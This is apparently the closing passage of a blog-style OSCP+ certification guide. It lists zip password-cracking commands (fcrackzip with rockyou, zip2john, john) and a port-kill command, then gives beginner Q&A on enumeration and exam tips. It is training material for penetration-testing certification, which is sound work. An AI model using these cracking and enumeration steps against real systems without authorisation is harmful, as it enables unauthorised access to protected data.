  • fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt'
  • zip2john > zip.john
  • john zip.john

Port Kill

sudo fuser -k 443/tcp

Commonly Asked Q&A

I’ve had many people ask me questions that I don’t have time to individually answer. Therefore, the following are my answers to the most asked questions.

1. I’m a beginner, how do I get started? What do you recommend before OSCP+?

Start with the eJPT certification, then move on to TJ_Null's list. Solve a few machines to assess your knowledge. After that, proceed to the official OffSec documentation and solve the labs.

2. Which service do I start enumerating first?

The first step is to scan all 65535 TCP ports and the top UDP ports. I recommend using an excellent tool called AutoRecon, which is permitted during the OSCP+ exam. Additionally, there are many port enumeration techniques. Most of the time, you'll gain initial access through HTTP ports like 80, 81, 443, 8080, and 8000. Run Gobuster to find vulnerabilities, RCE, etc. If you discover any credentials, try logging in on ports 21, 22, login pages, 3389, and 161.

Exam Tips

Set a time limit for each foothold (if time is up, MOVE ON)

Look for uncommon ports

Use manual enumeration over automated tools (I didn’t use any automated tools in the exam)

Do breadth-first enumeration instead of depth-first enumeration

Think about what you can enumerate from each service


Thank you, everyone. If you want to discuss anything related to OSCP+ or any other exam, just ping me. Thanks to OffSec for the OSCP+ Exam.

